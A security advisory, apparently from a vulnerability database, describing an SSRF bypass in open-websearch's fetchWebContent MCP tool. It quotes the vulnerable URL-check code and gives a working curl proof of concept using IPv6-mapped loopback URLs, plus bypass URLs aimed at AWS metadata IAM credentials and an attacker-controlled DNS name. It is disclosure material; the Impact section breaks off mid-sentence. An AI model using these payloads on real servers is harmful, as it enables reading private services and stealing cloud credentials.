Server-side request forgery (SSRF) In open-websearch

Description

open-websearch has SSRF in fetchWebContent MCP tool: bracketed IPv6 literals and non-resolving hostname check bypass isPrivateOrLocalHostname ### Summary src/utils/urlSafety.ts exposes isPublicHttpUrl / assertPublicHttpUrl, used to gate the MCP fetchWebContent tool against private-network targets. The check has two defects that together allow non-blind SSRF with the response body returned to the caller: 1. Bracketed IPv6 literals are never recognized. Node's WHATWG URL.hostname keeps the surrounding […] for IPv6 literals. isIP("[::1]") returns 0 (not 6), so neither isPrivateIpv4 nor isPrivateIpv6 is ever called on an IPv6 literal input — including [::1] itself, and including every IPv4-mapped form such as [::ffff:7f00:1] (= 127.0.0.1 via the IPv4 stack). 2. No DNS resolution. isPrivateOrLocalHostname only inspects the literal hostname string. It never resolves the host to an IP. Any attacker-controlled hostname whose DNS record points at 127.0.0.1 (or any RFC1918 / link-local address) passes the check unchanged, and axios then performs its own resolution and connects to the private address. The isPrivateIpv6 implementation also has the hex bypass (it would miss ::ffff:7f00:1 even if reached) but defect (1) makes every bracketed IPv6 literal slip past before that branch is even entered. The fetchWebContent tool returns the response body (JSON.stringify(result)) to the MCP caller, so the SSRF is non-blind. ### Details

Vulnerable functionsrc/utils/urlSafety.ts:95-119:

export function isPrivateOrLocalHostname(hostname: string): boolean { const host = hostname.trim().toLowerCase(); if (!host) return true; if (host === 'localhost' || host.endsWith('.localhost')) return true; if (host === 'metadata.google.internal' || host === 'metadata.azure.internal') return true; const integerIp = parseIntegerIpv4Literal(host); if (integerIp && isPrivateIpv4(integerIp)) return true; if (isPrivateOrLocalIp(host)) return true; // only runs if isIP(host) ∈ {4, 6} return false; } 

isPrivateOrLocalIpsrc/utils/urlSafety.ts:84-93:

function isPrivateOrLocalIp(ip: string): boolean { const version = isIP(ip); // returns 0 for "[::1]", "[::ffff:7f00:1]", any bracketed literal if (version === 4) return isPrivateIpv4(ip); if (version === 6) return isPrivateIpv6(ip); return false; } 

Caller — src/tools/setupTools.ts:252-286 (fetchWebContent tool):

server.tool( fetchWebToolName, // default: "fetchWebContent" "Fetch content from a public HTTP(S) URL ...", { url: z.string().url().refine( (url) => validatePublicWebUrl(url), // → isPublicHttpUrl → isPrivateOrLocalHostname "URL must be a public HTTP(S) address ..." ), /* … / }, async ({url, maxChars}) => { const result = await runtime.services.fetchWeb.execute({ url, maxChars, // }); return { content: [{ type: 'text', text: JSON.stringify(result, null, 2) }] }; } ); 

Service — src/engines/web/fetchWebContent.ts:313-375: re-validates via assertPublicHttpUrl (same broken check), then calls axios.head + axios.get on the raw URL and returns response.data and response.headers to the caller.

Transport — src/index.ts:85-253: when config.enableHttpServer is true (documented configuration; enabled by the Docker image), the MCP server binds on 0.0.0.0:${PORT} (default 3000) with CORS origin: '' and no authentication on /mcp (Streamable HTTP) or /sse (legacy SSE). Anyone who can reach the port can invoke any tool.

Verification of the validator (run against current HEAD)

I executed the real isPublicHttpUrl / assertPublicHttpUrl from src/utils/urlSafety.ts under tsx against a set of inputs:

Input URL | parsed.hostname | isPublicHttpUrl | assertPublicHttpUrl -- | -- | -- | -- http://[::ffff:7f00:1]/ (127.0.0.1) | [::ffff:7f00:1] | true ← bypass | PASSED ← bypass http://[::ffff:a9fe:1]/ (169.254.0.1) | [::ffff:a9fe:1] | true ← bypass | PASSED ← bypass http://[::ffff:a00:1]/ (10.0.0.1) | [::ffff:a00:1] | true ← bypass | PASSED ← bypass http://[::ffff:127.0.0.1]/ | [::ffff:7f00:1] | true ← bypass | PASSED ← bypass http://[0:0:0:0:0:0:0:1]/ | [::1] | true ← bypass | PASSED ← bypass http://[::1]/ (plain loopback!) | [::1] | true ← bypass | PASSED ← bypass http://127.0.0.1/ (control) | 127.0.0.1 | false (blocked) | threw (blocked) http://localhost/ (control) | localhost | false (blocked) | threw (blocked)

WHATWG new URL("http://[::ffff:127.0.0.1]/").hostname returns [::ffff:7f00:1] — note that Node's URL parser actively re-encodes the dotted form to hex, helping the bypass. Every bracketed IPv6 literal passes the validator.

Verification of the fetch (Node 22/25)

I bound a trivial HTTP server to 127.0.0.1:29999 and called axios.get("http://[::ffff:7f00:1]:29999/") from Node; the request reached the server:

 HIT: / from 127.0.0.1 family IPv4 http://[::ffff:7f00:1]:29999/ -> 200 <html>internal content</html> 

The OS routes ::ffff:X.X.X.X connections through the IPv4 stack, so the PoC works identically across macOS and Linux.

Environment: clean clone of Aas-ee/open-webSearch@HEAD, Node 22+. 1. Start the MCP HTTP server. bash git clone https://github.com/Aas-ee/open-webSearch.git cd open-webSearch npm install && npm run build MODE=http PORT=3000 node build/index.js & 2. Stand up a canary on loopback. bash node -e ' require("http").createServer((q,r)=>{ console.log("[canary]", q.method, q.url, "from", q.socket.remoteAddress); r.writeHead(200, {"content-type":"text/html"}); r.end("INTERNAL-SECRET: canary-hit for " + q.url); }).listen(19999, "127.0.0.1", () => console.log("canary on 127.0.0.1:19999")); ' & 3. Open an MCP session and call fetchWebContent with the bypass URL. bash # Accept header must include both JSON and SSE for Streamable HTTP transport. ACCEPT='application/json, text/event-stream' # initialize → grab the mcp-session-id header SID=$(curl -sSD - -o /dev/null -X POST http://127.0.0.1:3000/mcp \ -H "Accept: $ACCEPT" -H 'Content-Type: application/json' \ -d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-03-26","capabilities":{},"clientInfo":{"name":"poc","version":"0"}}}' \ | awk 'tolower($1)=="mcp-session-id:" { gsub(/\r/,""); print $2 }') # notifications/initialized curl -sS -X POST http://127.0.0.1:3000/mcp \ -H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \ -d '{"jsonrpc":"2.0","method":"notifications/initialized","params":{}}' >/dev/null # call fetchWebContent with the SSRF bypass URL curl -sS -X POST http://127.0.0.1:3000/mcp \ -H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \ -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{ "name":"fetchWebContent", "arguments":{"url":"http://[::ffff:7f00:1]:19999/internal","maxChars":10000} }}' Expected result: the canary logs [canary] GET /internal from 127.0.0.1, and the MCP response contains INTERNAL-SECRET: canary-hit for /internal in the tool's content[0].text. Additional bypass vectors that work the same way: - http://[::1]:<port>/ — plain IPv6 loopback. - http://[::ffff:a9fe:1]/latest/meta-data/iam/security-credentials/ — AWS EC2 metadata over the IPv4 stack. - http://attacker.example/ where attacker.example has A/AAAA pointing at any private address — bypasses via defect (2), no IPv6 trick needed. ### Impact - Cross-tenant SSRF with full response body. Any client that can speak MCP to the HTTP transport can fetch arbitrary private-network URLs and receive the response body. AWS EC2 metadata, internal dashboards, loopback services, RFC1918 neighbours — all in scope. - Pre-auth when enableHttpServer is set. No authentication layer exists on /mcp or /sse; CORS is *. - DNS-rebinding / LAN-victim angle. Because /mcp is CORS * and accepts POST, a victim

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions